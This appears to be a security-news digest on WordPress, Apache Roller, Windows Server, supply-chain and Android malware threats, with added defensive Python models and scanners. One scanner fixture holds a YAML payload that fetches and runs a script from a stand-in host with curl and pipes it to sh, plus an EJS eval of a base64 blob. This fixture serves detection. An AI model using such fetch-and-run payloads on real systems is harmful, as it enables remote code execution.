This vulnerability is particularly dangerous when the SureTriggers plugin is installed but not yet configured with a valid API key. In this state, an attacker can send requests with a blank secret key, tricking the plugin into granting access to sensitive REST API functions, including the ability to create new admin accounts. Exploiting this flaw could enable malicious actors to upload malicious themes or plugins, inject spam, redirect site visitors, and establish persistent backdoors, ultimately gaining full control of the affected WordPress site.

WordPress site owners are urged to update immediately to SureTriggers/OttoKit version 1.0.79, which patches the flaw. Because exploitation leaves an account behind rather than a file, owners should also review the WordPress user list for unfamiliar administrator accounts (checking creation dates against the disclosure window), and make sure every API-driven plugin has its key configured and stored securely rather than left blank. Attackers began exploiting the flaw within hours of public disclosure, creating bogus administrator accounts; the attempts observed so far originated from two IP addresses, 2a01:e5c0:3167::2 (IPv6) and 89.169.15.201 (IPv4).
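The following is an added example, not the plugin's own code, that models the class of bug described above: an API-key check that compares the request's key with the stored key but never rejects an empty stored key, placed beside a fixed version. The header name "ST-Authorization", the endpoint shape and the user store are assumptions made for the illustration.

```python
# Added example (not the plugin's code): models the class of bug described above,
# an API-key check that never rejects an empty stored key, beside a fixed version.
# The header name "ST-Authorization" and the endpoint shape are assumptions.
import hmac

ADMIN_ROLE = "administrator"


class VulnerableAuth:
    """Key is '' until the site owner pastes one in (the 'not yet configured' state)."""

    def __init__(self, stored_key: str = "") -> None:
        self.stored_key = stored_key

    def authenticate(self, headers: dict) -> bool:
        # Bug: no emptiness check, so an absent/blank header equals a blank stored key.
        supplied = headers.get("ST-Authorization", "")
        return supplied == self.stored_key


class HardenedAuth:
    def __init__(self, stored_key: str = "") -> None:
        self.stored_key = stored_key

    def authenticate(self, headers: dict) -> bool:
        supplied = headers.get("ST-Authorization")
        # Fail closed: an unconfigured key or a missing/blank header is never valid.
        if not self.stored_key or not supplied:
            return False
        # Constant-time comparison so the key cannot be guessed byte by byte.
        return hmac.compare_digest(supplied.encode(), self.stored_key.encode())


def create_user_endpoint(auth, headers: dict, body: dict, users: dict) -> int:
    """Simulated REST handler: returns an HTTP status and, on 201, adds the user."""
    if not auth.authenticate(headers):
        return 401
    users[body["user_login"]] = {"role": body.get("role", "subscriber")}
    return 201


def run_attack(auth_cls):
    """Unconfigured site; attacker sends no key at all and asks for an admin account."""
    users = {"owner": {"role": ADMIN_ROLE}}
    status = create_user_endpoint(
        auth_cls(stored_key=""),          # plugin installed but never configured
        headers={},                        # blank / absent secret key
        body={"user_login": "rogue", "role": ADMIN_ROLE},
        users=users,
    )
    return status, users


def unexpected_admins(users: dict, known_admins: set) -> list:
    """Post-incident check: admin accounts the site owner does not recognise."""
    return sorted(u for u, meta in users.items()
                  if meta["role"] == ADMIN_ROLE and u not in known_admins)


if __name__ == "__main__":
    for cls in (VulnerableAuth, HardenedAuth):
        status, users = run_attack(cls)
        print(cls.__name__, status, unexpected_admins(users, {"owner"}))
```

The fix is the two-line fail-closed check: an unconfigured key must never authenticate anything, and the comparison should be constant-time. `unexpected_admins` is the post-incident review the advisory asks for, expressed as a function over the user table.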

Recommended read:
References :
  • securityonline.info: SureTriggers Vulnerability Exposes 100,000+ WordPress Sites to Admin Takeover
  • BleepingComputer: Hackers started exploiting a high-severity flaw that allows bypassing authentication in the OttoKit (formerly SureTriggers) plugin for WordPress just hours after public disclosure.
  • thecyberexpress.com: 100,000+ WordPress Sites at Risk as SureTriggers Exploit Goes Live
  • bsky.app: Bsky post on Hackers exploit WordPress plugin auth bypass hours after disclosure
  • www.scworld.com: Immediate exploitation of high-severity WordPress plugin flaw reported
  • gbhackers.com: WordPress Plugin Rogue Account-Creation Flaw Leaves 100K WordPress Sites Exposed
  • Cyber Security News: Rogue User-Creation Bug Exposes 100,000 WordPress Sites to Takeover
  • thehackernews.com: OttoKit WordPress Plugin Admin Creation Vulnerability Under Active Exploitation
  • gbhackers.com: A severe vulnerability has been uncovered in the SureTriggers WordPress plugin, which could leave over 100,000 websites at risk. The issue, discovered by security researcher mikemyers, allows attackers to create rogue administrative users on sites where the plugin is not properly configured.
  • securityaffairs.com: Attackers are exploiting recently disclosed OttoKit WordPress plugin flaw
  • ciso2ciso.com: Attackers are actively exploiting a vulnerability in the OttoKit (formerly SureTriggers) WordPress plugin, with many websites potentially exposed to complete compromise.
  • Security Risk Advisors: Critical Authentication Bypass in WordPress SureTriggers Plugin Leads to Admin Account Creation

@learn.microsoft.com //
Microsoft is alerting IT administrators to a significant issue affecting Windows Server 2025 domain controllers (DCs). After a restart, these DCs may experience a loss of network connectivity due to the servers loading the standard firewall profile instead of the domain firewall profile. This problem can render the domain controllers inaccessible on the network, disrupting Active Directory (AD) environments and potentially causing applications and services running on those servers or remote devices to fail or remain unreachable. The issue primarily impacts systems running the Active Directory Domain Services role on Windows Server 2025, with no client systems or earlier server versions affected.

The problem is that, after a reboot, the domain controller fails to detect the domain network and applies the "Public" (standard) firewall profile instead of the required "Domain Authenticated" profile. Because the wrong rule set is in effect, the DC can be unreachable on the domain network or, conversely, reachable over ports and protocols that the domain profile would have restricted, so the bug is both an availability and an exposure issue. Essential AD functions such as Group Policy application, replication, and authentication are disrupted as a result, compounding the problem for organizations that rely on Active Directory for network management.

Microsoft is working on a permanent fix, expected in a future update, and has published a temporary workaround: restart the network adapter on the affected server with the PowerShell command 'Restart-NetAdapter *', which makes the adapter re-evaluate the network and pick up the domain profile. Because the issue recurs on every restart, the workaround must be repeated each time; Microsoft suggests a scheduled task, triggered at startup, that runs the command automatically. Administrators should confirm the workaround took effect by checking that the adapter now reports the Domain Authenticated profile (for example with Get-NetConnectionProfile) rather than assuming it did.

Recommended read:
References :
  • Techzine Global: Emergency Windows update solves Active Directory problem. Microsoft is launching emergency patches to correctly display local audit logon policies in Active Directory Group Policy.
  • bsky.app: Microsoft has released emergency Windows updates to address a known issue affecting local audit logon policies in Active Directory Group Policy. https://www.bleepingcomputer.com/news/microsoft/microsoft-new-emergency-windows-updates-fix-ad-policy-issues/
  • BleepingComputer: Microsoft: New Windows updates fix Active Directory policy issues. Microsoft has released emergency Windows updates to address a known issue affecting local audit logon policies in Active Directory Group Policy.
  • Cyber Security News: Windows Server 2025 Restart Bug Breaks Connection with Active Directory Domain Controller
  • www.networkworld.com: Windows Server 2025 domain controllers may lose connectivity after reboot, says Microsoft
  • BleepingComputer: Microsoft: Windows Server 2025 restarts break connectivity on some DCs
  • Techzine Global: Microsoft warns that Windows Server 2025 domain controllers may become inaccessible after a restart. Affected servers load the default firewall profile instead of the domain firewall profile, interrupting applications and services.

Dissent@DataBreaches.Net //
China has accused the United States National Security Agency (NSA) of launching "advanced" cyberattacks during the Asian Winter Games in February 2025, targeting essential industries. Police in the northeastern city of Harbin have placed three alleged NSA agents on a wanted list, accusing them of attacking the Winter Games' event information system and key information infrastructure in Heilongjiang province, where Harbin is located. The named NSA agents are Katheryn A. Wilson, Robert J. Snelling, and Stephen W. Johnson, all allegedly members of the NSA's Tailored Access Operations (TAO) offensive cyber unit.

China Daily reports the TAO targeted systems used for registration, timekeeping, and competition entry at the Games, systems which store "vast amounts of sensitive personal data." The publication also stated the TAO appeared to be trying to implant backdoors and used multiple front organizations to purchase servers in Europe and Asia to conceal its tracks and acquire the tools used to breach Chinese systems. A joint report from China's computer emergency response centers (CERTs) stated that over 270,000 attacks on the Asian Winter Games were detected, with 170,000 allegedly launched by the US.

Chinese foreign ministry spokesperson Lin Jian condemned the alleged cyber activity, urging the U.S. to take a responsible attitude on cybersecurity issues and stop any attacks and "groundless vilification against China." Xinhua reported the agents repeatedly carried out cyber attacks on China’s critical information infrastructure and participated in cyber attacks on Huawei and other enterprises. Chinese law enforcement agencies are seeking information that could lead to the arrest of the three NSA operatives, though rewards were not disclosed.

Recommended read:
References :
  • The Register - Security: China names alleged US snoops over Asian Winter Games attacks
  • www.cybersecurity-insiders.com: China accuses US of launching advanced Cyber Attacks on its infrastructure
  • CyberScoop: Chinese law enforcement places NSA operatives on wanted list over alleged cyberattacks
  • DataBreaches.Net: China accuses US of launching ‘advanced’ cyberattacks, names alleged NSA agents
  • www.scworld.com: China's allegation that NSA hacked Asian Winter Games draws suspicion
  • PCMag UK security: Police in the Chinese city of Harbin say three NSA operatives disrupted the 2025 Asian Winter Games and hacked Huawei.
  • www.csoonline.com: China accused the United States National Security Agency (NSA) on Tuesday of launching "advanced" cyberattacks during the Asian Winter Games in February, targeting essential industries.
  • Metacurity: China accuses NSA of 'advanced cyberattacks' during the Asian Winter Games
  • www.dailymail.co.uk: China accuses US of launching 'advanced' cyberattacks, names alleged NSA agents
  • sysdig.com: UNC5174’s evolution in China’s ongoing cyber warfare: From SNOWLIGHT to VShell

@www.csoonline.com //
A new software-supply-chain threat dubbed "slopsquatting" exploits a failure mode of AI code generation. Large language models (LLMs) that write code often "hallucinate" packages or dependencies that do not exist. An attacker can register those hallucinated names on a public registry such as PyPI or npm and publish malicious code under them. When a developer (or a CI pipeline) installs what the assistant suggested, the name now resolves to the attacker's package, and its install hooks or imports run the attacker's code, compromising the supply chain.

The vulnerability arises because popular programming languages rely heavily on centralized package repositories and open-source software, and that reliance combined with the growing use of AI code-generating tools creates a novel attack vector. A study analyzing 16 code generation AI models found that nearly 20% of the recommended packages did not exist. When the same prompts were repeated, a significant portion of the hallucinated packages were suggested again, which is what makes the attack practical: the hallucinations are not random one-off errors but a persistent phenomenon, so an attacker only needs to register the names a model produces reliably.

Security experts describe slopsquatting as a relative of typosquatting: instead of betting on a human misspelling a real name, the attacker bets on a model inventing one. To mitigate it, developers should treat AI-suggested dependencies as untrusted input and verify that each package exists, is the one intended, and is maintained before installing it; organizations should resolve dependencies only from a curated internal index or allowlist, pin them with hashes (for example pip's --require-hashes mode), and watch for installs of newly registered packages. As AI code generation becomes routine, closing this gap is part of protecting the software supply chain.
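As an added example (not code from the cited study or from any package manager), the check below vets a list of AI-suggested dependency names against a local snapshot of a curated index before anything is installed, reports which real package an unknown name resembles, and verifies that a lockfile pins every requirement by hash. The index snapshot, the suggested names and the lockfile are constructed sample data; the placeholder digest is not a real hash.

```python
# Added example, not from the cited study or any tool: vets AI-suggested dependency
# names against a curated index snapshot before anything is installed, and checks
# that a lockfile pins every requirement by hash. All sample data is constructed.
import difflib
import re
from dataclasses import dataclass
from typing import Optional

# Constructed stand-in for a curated allowlist / private mirror listing.
KNOWN_PACKAGES = {"requests", "numpy", "PyYAML", "cryptography", "click"}

# Constructed "AI assistant" output: three real names, one typo-like name, one
# plausible-sounding name that does not exist in the curated index.
SUGGESTED = ["requests", "pyyaml", "reqeusts", "numpy-fast-io", "click"]

# Constructed lockfile; the digest is a placeholder, not a real sha256.
PLACEHOLDER_DIGEST = "a" * 64
SAMPLE_LOCKFILE = (
    "# generated by pip-compile --generate-hashes (constructed sample)\n"
    "requests==2.32.3 --hash=sha256:" + PLACEHOLDER_DIGEST + "\n"
    "numpy-fast-io==0.1.0\n"
)


@dataclass(frozen=True)
class Finding:
    name: str
    reason: str
    resembles: Optional[str] = None


def normalize(name: str) -> str:
    """PEP 503 name normalisation: case-insensitive, runs of -_. become '-'."""
    return re.sub(r"[-_.]+", "-", name).lower()


def vet_suggestions(suggested, known=KNOWN_PACKAGES, cutoff=0.8):
    """Flag names absent from the curated index; note which real package they resemble."""
    known_norm = {normalize(k) for k in known}
    findings = []
    for name in suggested:
        n = normalize(name)
        if n in known_norm:
            continue
        # Hallucinated names often ride on a real one: typo-distance or a real
        # package used as a hyphenated prefix ("numpy-" + something).
        close = difflib.get_close_matches(n, sorted(known_norm), n=1, cutoff=cutoff)
        prefix = [k for k in known_norm if n.startswith(k + "-")]
        resembles = close[0] if close else (prefix[0] if prefix else None)
        findings.append(Finding(name, "not in curated index", resembles))
    return findings


def unpinned_requirements(lockfile_text: str) -> list:
    """Names lacking a sha256 pin (pip --require-hashes would refuse to install them).
    Assumes one requirement per line, as in the constructed sample."""
    unpinned = []
    for line in lockfile_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        m = re.match(r"([A-Za-z0-9][A-Za-z0-9._-]*)==", line)
        if m and not re.search(r"--hash=sha256:[0-9a-f]{64}\b", line):
            unpinned.append(m.group(1))
    return unpinned


if __name__ == "__main__":
    for f in vet_suggestions(SUGGESTED):
        extra = f" (resembles {f.resembles})" if f.resembles else ""
        print(f"{f.name}: {f.reason}{extra}")
    print("unpinned:", unpinned_requirements(SAMPLE_LOCKFILE))
```

The "resembles" field is what turns a bare "unknown package" into something a reviewer can act on: a near-miss of a real name is the slopsquatting signature, and the lockfile check catches the case where such a name slipped into CI without a pinned hash.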

@unit42.paloaltonetworks.com //
North Korean state-sponsored group Slow Pisces, also known as Jade Sleet, TraderTraitor, and PUKCHONG, is actively targeting cryptocurrency developers through social engineering campaigns on LinkedIn. Security researchers at Palo Alto Networks have uncovered a scheme where the group poses as potential employers, enticing developers with coding challenges that are actually malware delivery mechanisms. The malicious activity is suspected to be connected to the massive Bybit hack that occurred in February 2025.

The attackers send what appear to be legitimate coding assignments to the developers, but these challenges contain malware disguised within compromised projects. When the developers run these projects, their systems become infected with new customized Python malware dubbed RN Loader and RN Stealer. RN Loader collects basic information about the victim's machine and operating system, sending it to a remote server, while RN Stealer is designed to harvest sensitive data from infected Apple macOS systems, including system metadata and installed applications.

GitHub and LinkedIn have taken action to remove the malicious accounts used by Slow Pisces. Both companies affirm that they use automated technology, expert teams, and user reporting to combat malicious actors. Palo Alto Networks customers are protected through their Next-Generation Firewall with Advanced URL Filtering and Advanced DNS Security subscriptions. They urge those who suspect they might be compromised to contact the Unit 42 Incident Response team.
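The practical defence for a developer who receives an unsolicited "coding challenge" is to treat the repository as untrusted input: run it only in a disposable VM, and scan it before running anything. The following added example (not Unit 42's code) is such a pre-run scan over a constructed in-memory repository. The page's references say the repositories hide Python and JS malware with YAML/EJS tricks; the specific patterns searched for here (unsafe `yaml.load`, `!!python/` tags, `pickle`, `eval`, EJS/JS `eval`, `child_process`) are this example's assumptions about what such tricks look like, not indicators taken from the report.

```python
# Added example, not Unit 42's code: a pre-run scan of an unsolicited "coding
# challenge" repository for Python/JS deserialisation and eval tricks. The repository
# is a constructed in-memory sample; the patterns are assumptions about what to look
# for, not indicators from the report.
import re

# (rule name, file suffixes it applies to, pattern applied per line)
RULES = [
    ("unsafe-yaml-load",  (".py",),          re.compile(r"yaml\.load\((?!.*SafeLoader)")),
    ("python-object-tag", (".yaml", ".yml"), re.compile(r"!!python/")),
    ("pickle-or-marshal", (".py",),          re.compile(r"\b(?:pickle|marshal)\.loads?\(")),
    ("py-eval-exec",      (".py",),          re.compile(r"\b(?:eval|exec)\(")),
    ("js-eval",           (".js", ".ejs"),   re.compile(r"\b(?:eval|new\s+Function)\(")),
    ("js-child-process",  (".js", ".ejs"),   re.compile(r"child_process")),
]

# Constructed sample repository (path -> contents). The hostname is a placeholder.
SAMPLE_REPO = {
    "config.yaml": '!!python/object/apply:os.system ["curl http://c2.example.invalid/s | sh"]\n',
    "app/loader.py": 'import yaml\ncfg = yaml.load(open("config.yaml"), Loader=yaml.Loader)\n',
    "app/safe.py": 'import yaml\ncfg = yaml.load(open("config.yaml"), Loader=yaml.SafeLoader)\n',
    "views/index.ejs": "<%- eval(Buffer.from(settings.blob, 'base64').toString()) %>\n",
    "README.md": "# Take-home challenge\nRun `python app/loader.py` to start.\n",
}


def scan_repo(repo: dict) -> list:
    """Return (path, line_no, rule) for every rule hit, scanning line by line."""
    hits = []
    for path, text in repo.items():
        for rule, suffixes, pattern in RULES:
            if not path.endswith(suffixes):
                continue
            for no, line in enumerate(text.splitlines(), 1):
                if pattern.search(line):
                    hits.append((path, no, rule))
    return hits


def verdict(hits: list) -> str:
    """Anything that deserialises or evals data shipped in the repo is a hard stop."""
    return "do-not-run" if hits else "no-static-hits"


if __name__ == "__main__":
    for hit in scan_repo(SAMPLE_REPO):
        print("%s:%d %s" % hit)
    print(verdict(scan_repo(SAMPLE_REPO)))
```

The `safe.py` entry shows the negative case: the same `yaml.load` call with `SafeLoader` is not flagged, because the danger is the full (object-constructing) loader paired with a YAML file the challenge author controls.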

Recommended read:
References :
  • Virus Bulletin: VirusBulletin reports on Slow Pisces (aka Jade Sleet, TraderTraitor, PUKCHONG) campaign targeting cryptocurrency developers on LinkedIn, posing as potential employers and sending malware disguised as coding challenges.
  • unit42.paloaltonetworks.com: Unit 42 reports that North Korean state-sponsored group Slow Pisces (Jade Sleet) targeted crypto developers with a social engineering campaign that included malicious coding challenges.
  • securityonline.info: Slow Pisces Targets Crypto Developers with Deceptive Coding Challenges
  • The Hacker News: Crypto Developers Targeted by Python Malware Disguised as Coding Challenges
  • Unit 42: Slow Pisces Targets Developers With Coding Challenges and Introduces New Customized Python Malware
  • Security Risk Advisors: Slow Pisces Targets Crypto Developers With "Coding Challenges" That Deliver New RN Loader and RN Stealer Malware
  • www.itpro.com: Hackers are duping developers with malware-laden coding challenges
  • cyberpress.org: Slow Pisces Hackers Target Developers with Malicious Python Coding Tests
  • gbhackers.com: Slow Pisces Group Targets Developers Using Coding Challenges Laced with Python Malware
  • Security Risk Advisors: North Korea-based Slow Pisces group hits crypto devs with LinkedIn "coding challenges"; the repositories mask Python and JS malware using YAML/EJS tricks.

@thehackernews.com //
A critical security vulnerability, CVE-2025-24859, has been discovered in Apache Roller, a widely used Java-based blogging platform. The flaw, which carries a CVSS score of 10.0, affects all versions from 1.0.0 up to and including 6.1.4. This vulnerability allows malicious actors to retain unauthorized access to blog sites even after a password change.

The core of the issue lies in insufficient session expiration. When a user or administrator changes a password, Apache Roller versions before 6.1.5 do not properly invalidate existing sessions. Consequently, any session tokens or cookies issued before the password change remain valid, creating a significant security risk. An attacker who has compromised a user’s credentials can maintain access to the application through the old session, effectively bypassing the intended protection of a password change.

Administrators and users of Apache Roller should upgrade to version 6.1.5 or later, which introduces centralized session management so that every active session is terminated immediately when a password is changed or a user is deactivated. The fix only applies to changes made after the upgrade: any account whose credentials may already have been compromised should have its password changed again once 6.1.5 is running, so that the attacker's existing session is actually revoked. In related news, a critical vulnerability in Gladinet CentreStack also affects its Triofox remote access solution, and multiple organizations have already been compromised through it.

Recommended read:
References :
  • Cyber Security News: A critical security vulnerability, CVE-2025-24859, has been discovered in Apache Roller, a widely used Java-based blogging platform.
  • Anonymous: A recently disclosed security flaw in Gladinet CentreStack also impacts its Triofox remote access and collaboration solution, according to Huntress, with seven different organizations compromised to date.
  • securityaffairs.com: A critical vulnerability, tracked as CVE-2025-24859 (CVSS score of 10.0), affects the Apache Roller open-source, Java-based blogging server software.
  • securityonline.info: A security vulnerability has been identified in Apache Roller, a Java-based blog server, that could allow unauthorized access
  • The Hacker News: A critical security vulnerability has been disclosed in the Apache Roller open-source, Java-based blogging server software that could allow malicious actors to retain unauthorized access even after a password change.

@securityonline.info //
A critical security vulnerability has been discovered in Apache Roller, a Java-based blogging server software. The flaw, identified as CVE-2025-24859 and carrying a maximum severity CVSS score of 10.0, allows attackers to retain unauthorized access even after a user changes their password. This session management issue affects Apache Roller versions up to and including 6.1.4, potentially exposing blogs to unauthorized actions and undermining the security measures intended by password changes.

The vulnerability stems from the failure to properly invalidate active user sessions when a password is changed, either by the user or an administrator. This means that an attacker who has compromised a user's credentials could maintain continued access through an old session, even after the user has taken steps to secure their account by changing their password. This poses a significant risk, as it could enable unauthorized individuals to access and manipulate blog content, potentially leading to data breaches or other malicious activities.

To address this critical flaw, Apache Roller version 6.1.5 has been released with a fix that implements centralized session management. This ensures that all active sessions are invalidated when passwords are changed or users are disabled, effectively preventing attackers from maintaining unauthorized access. Users of Apache Roller are strongly advised to upgrade to version 6.1.5 as soon as possible to mitigate the risk of exploitation and safeguard their blog sites from potential security breaches. The vulnerability was discovered and reported by security researcher Haining Meng.
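The two Apache Roller items above describe the same session-handling bug. The following added example (not Apache Roller's code) models it in the abstract: a session store that leaves sessions alive after a password change, next to a centralized store that indexes sessions by user and revokes them all on password change and on user deactivation. Class names, the hashing parameters and the scenario are this example's own choices.

```python
# Added example, not Apache Roller's code: the session bug described above modelled
# as a store that keeps sessions after a password change, next to a centralised store
# that revokes them (and also on user deactivation). Names and parameters are this
# example's own choices.
import hashlib
import os
import secrets
from collections import defaultdict


def _hash_password(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 200_000)


class VulnerableSessionStore:
    """Pre-fix behaviour: a password change never touches existing sessions."""

    def __init__(self) -> None:
        self.creds = {}     # user -> (salt, hash)
        self.sessions = {}  # token -> user

    def set_password(self, user: str, password: str) -> None:
        salt = os.urandom(16)
        self.creds[user] = (salt, _hash_password(password, salt))

    def login(self, user: str, password: str):
        salt, stored = self.creds[user]
        if not secrets.compare_digest(stored, _hash_password(password, salt)):
            return None
        token = secrets.token_urlsafe(32)
        self.sessions[token] = user
        return token

    def change_password(self, user: str, new_password: str) -> None:
        self.set_password(user, new_password)   # sessions left untouched: the bug

    def is_valid(self, token) -> bool:
        return token in self.sessions


class CentralizedSessionStore(VulnerableSessionStore):
    """Fixed behaviour: sessions are indexed by user so all of them can be revoked at once."""

    def __init__(self) -> None:
        super().__init__()
        self.by_user = defaultdict(set)
        self.disabled = set()

    def login(self, user, password):
        if user in self.disabled:
            return None
        token = super().login(user, password)
        if token is not None:
            self.by_user[user].add(token)
        return token

    def revoke_all(self, user: str) -> int:
        tokens = self.by_user.pop(user, set())
        for t in tokens:
            self.sessions.pop(t, None)
        return len(tokens)

    def change_password(self, user, new_password):
        super().change_password(user, new_password)
        self.revoke_all(user)

    def disable_user(self, user: str) -> None:
        self.disabled.add(user)
        self.revoke_all(user)


def attacker_keeps_access(store_cls) -> bool:
    """Attacker logs in with stolen credentials; the victim then changes the password."""
    store = store_cls()
    store.set_password("editor", "stolen-pw")
    attacker_token = store.login("editor", "stolen-pw")
    store.change_password("editor", "new-strong-pw")
    return store.is_valid(attacker_token)


if __name__ == "__main__":
    print("vulnerable:", attacker_keeps_access(VulnerableSessionStore))   # True
    print("fixed:     ", attacker_keeps_access(CentralizedSessionStore))  # False
```

The important design point is the user-to-sessions index: without it, a server can only expire sessions one token at a time or by global timeout, which is exactly the gap a password change is supposed to close. Where sessions live in a signed cookie rather than a server-side table, the equivalent is a per-user generation counter checked on every request and bumped on password change.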

Recommended read:
References :
  • securityaffairs.com: Critical Apache Roller flaw allows to retain unauthorized access even after a password change
  • securityonline.info: CVE-2025-24859 (CVSSv4 10): Apache Roller Flaw Exposes Blogs to Unauthorized Access
  • The Hacker News: Critical Apache Roller Vulnerability (CVSS 10.0) Enables Unauthorized Session Persistence
  • bsky.app: 10/10 CVSS in the Apache Roller blogging platform "active user sessions are not properly invalidated after password changes"
  • ciso2ciso.com: Critical Apache Roller flaw allows to retain unauthorized access even after a password change – Source: securityaffairs.com
  • lists.apache.org: Apache Roller Fails to Invalidate Sessions on Password Change (CVE-2025-24859)

@www.bleepingcomputer.com //
Microsoft is set to block ActiveX controls by default in the Windows versions of Microsoft 365 Apps and Office 2024. This move, announced in April 2025, aims to enhance security by addressing vulnerabilities associated with the legacy software framework. ActiveX controls, introduced in 1996, enabled developers to create interactive objects embedded in Office documents. However, over time, these controls have become a significant point of entry for cybercriminals, similar to macros in Excel, with examples such as the propagation of the TrickBot malware through ActiveX.

Microsoft's decision to disable ActiveX controls by default is part of a broader effort to bolster the security of its products. Since 2018, the company has implemented various measures to block attack vectors exploiting Office applications. These include blocking VBA macros, disabling Excel 4.0 (XLM) macros by default, blocking untrusted XLL add-ins, and phasing out VBScript. The default setting previously was to prompt users before enabling ActiveX, which required users to understand the risks before granting permissions.

Once the change is deployed, a document that contains an ActiveX control will show the notification "BLOCKED CONTENT: The ActiveX content in this file is blocked", and the control will not run. This is stronger than the previous prompt-based default because nothing is executed until someone explicitly changes the setting. Users can still re-enable ActiveX controls through the Trust Center, provided administrators have granted them access to the ActiveX settings page; organizations that want the protection to hold should therefore lock that setting centrally rather than rely on the new default alone.

Recommended read:
References :
  • The Register - Software: ActiveX blocked by default in Microsoft 365 because remote code execution is bad, OK?
  • Will Dormann: Microsoft blocks ActiveX by default in Microsoft 365, Office 2024 About damn time!
  • www.bleepingcomputer.com: Microsoft blocks ActiveX by default in Microsoft 365, Office 2024
  • IT-Connect: Microsoft: ActiveX controls will soon be blocked by default in Office and Microsoft 365 Apps
  • Cyber Security News: Microsoft Disables ActiveX by Default in 365 to Block Malware Execution by Hackers

Pierluigi Paganini@securityaffairs.com //
A new cybersecurity threat has emerged, with cheap Chinese Android phones being shipped with pre-installed malware disguised as popular messaging apps like WhatsApp and Telegram. These trojanized applications contain cryptocurrency clippers, malicious programs designed to replace copied wallet addresses with those controlled by the attackers. This allows the theft of cryptocurrency during transactions without the user's knowledge. The campaign, active since June 2024, targets low-end devices, often mimicking premium brands like Samsung and Huawei, with models such as "S23 Ultra," "Note 13 Pro," and "P70 Ultra." At least four of the affected models are manufactured under the SHOWJI brand.

The counterfeit phones also spoof their specifications, reporting a current Android version and better hardware than they actually have, which helps them pass casual inspection. According to researchers at Doctor Web, the infected devices ship with modified WhatsApp builds that act as clippers, silently swapping wallet strings for popular coins such as Ethereum and Tron whenever users send or receive them in chat. Victims do not notice because the malware shows the correct address on the sender's screen but delivers the attacker's address to the receiver, and the reverse for incoming messages, so neither side sees the substitution until the funds are gone.

The attackers have expanded their reach beyond WhatsApp and Telegram, with researchers identifying nearly 40 fake applications, including crypto wallets like Trust Wallet and MathWallet, and even QR code readers. The malware is injected using a tool called LSPatch, allowing modifications without altering the core app code, which helps evade detection and survive updates. Doctor Web reports that the malware hijacks the app update process to retrieve an APK file from a server under the attacker's control and searches for strings in chat conversations that match cryptocurrency wallet address patterns.
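As an added example (not Doctor Web's analysis code), the block below shows the three pieces the description above implies: the address-pattern matching a clipper needs, the swap it performs on a message body in transit, and a check that recovers what was swapped when the sender's copy and the delivered copy can be compared out of band. The addresses and messages are constructed; the "attacker" addresses are placeholders, not real indicators.

```python
# Added example, not Doctor Web's analysis code: wallet-address pattern matching, the
# in-transit swap a clipper performs, and a two-copy comparison that reveals the swap.
# Addresses and messages are constructed; the attacker addresses are placeholders.
import re

# Ethereum: 0x + 40 hex. Tron: 'T' + 33 base58 chars (no 0, O, I, l).
ADDRESS_PATTERNS = {
    "ethereum": re.compile(r"\b0x[0-9a-fA-F]{40}\b"),
    "tron": re.compile(r"\bT[1-9A-HJ-NP-Za-km-z]{33}\b"),
}

# Constructed attacker-controlled destinations (placeholders).
ATTACKER_ADDRESSES = {
    "ethereum": "0x" + "d" * 40,
    "tron": "TAbcdEfghJkmnPqrstUvwxyzABCDEFGHJK",
}

# Constructed message as typed by the sender.
SENT_MESSAGE = ("send the 0.5 ETH to 0x" + "1" * 40 +
                " and the TRX to TJRZ2Cs7DiUpXcv3Mj5Hk8NqW4EaQ9mTbF thanks")


def find_addresses(text: str) -> list:
    """(kind, address) for every wallet address the patterns recognise, in text order."""
    found = [(kind, m.group(0), m.start()) for kind, pat in ADDRESS_PATTERNS.items()
             for m in pat.finditer(text)]
    return [(kind, addr) for kind, addr, _ in sorted(found, key=lambda f: f[2])]


def clipper_rewrite(text: str, targets=ATTACKER_ADDRESSES) -> str:
    """What the trojanised messenger does to a message body between the two screens."""
    for kind, pat in ADDRESS_PATTERNS.items():
        text = pat.sub(targets[kind], text)
    return text


def detect_swaps(shown_to_sender: str, delivered: str) -> list:
    """(kind, original, replacement) where the two copies disagree on an address.
    The sender's own screen cannot reveal this; the comparison needs a second channel."""
    shown = find_addresses(shown_to_sender)
    recv = find_addresses(delivered)
    return [(k1, a, b) for (k1, a), (k2, b) in zip(shown, recv) if k1 == k2 and a != b]


def fingerprint(addr: str) -> str:
    """Short form to read back over a call or second channel: first 6 + last 4 chars."""
    return f"{addr[:6]}...{addr[-4:]}"


if __name__ == "__main__":
    delivered = clipper_rewrite(SENT_MESSAGE)
    for kind, original, replacement in detect_swaps(SENT_MESSAGE, delivered):
        print(kind, fingerprint(original), "->", fingerprint(replacement))
```

The practical lesson is in `detect_swaps`: the substitution is only visible when the two ends compare what they saw, which is why confirming an address fingerprint over a second channel (a call, a different app on a different device) defeats a clipper that owns the messaging app on one side.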

Recommended read:
References :
  • hackread.com: Pre-Installed Malware on Cheap Android Phones Steals Crypto via Fake WhatsApp
  • securityaffairs.com: Chinese Android phones shipped with malware-laced WhatsApp, Telegram apps
  • The Hacker News: Chinese Android Phones Shipped with Fake WhatsApp, Telegram Apps Targeting Crypto Users

Aman Mishra@gbhackers.com //
A sophisticated malware campaign impersonating PDFCandy.com is distributing the ArechClient2 information stealer, according to research from CloudSEK. Cybercriminals are creating fake websites that closely mimic the legitimate PDF conversion tool, tricking users into downloading malware. These deceptive sites are promoted through Google Ads and exploit the common need for online file conversion. By replicating the user interface and using similar domain names, attackers deceive unsuspecting users into believing they are interacting with a trusted service.

The attack unfolds through a series of social engineering tactics. Victims are prompted to upload a PDF file for conversion, after which a simulated loading sequence creates the illusion of genuine file processing. This builds trust and lowers the user’s guard. Subsequently, users are presented with a fake CAPTCHA verification dialog, designed to enhance the site’s perceived authenticity and create a sense of urgency, potentially rushing the user into action. The CAPTCHA acts as a pivotal interaction point to trigger the malicious payload.

After the fake conversion and CAPTCHA steps, the page instructs the user to run a PowerShell command. That user-run command is the actual infection step: it starts a chain of redirects that hides where the payload comes from and ends with ArechClient2, an infostealer known for harvesting browser credentials and cryptocurrency wallet data. Because the malware is launched by the victim rather than by a document exploit, the most direct detection is endpoint telemetry on PowerShell started from a user session with a download-and-execute command line. Users should rely on verified tools from official websites and never paste commands from a web page into a shell; organizations should keep anti-malware software updated and deploy endpoint detection and response to catch the execution chain.
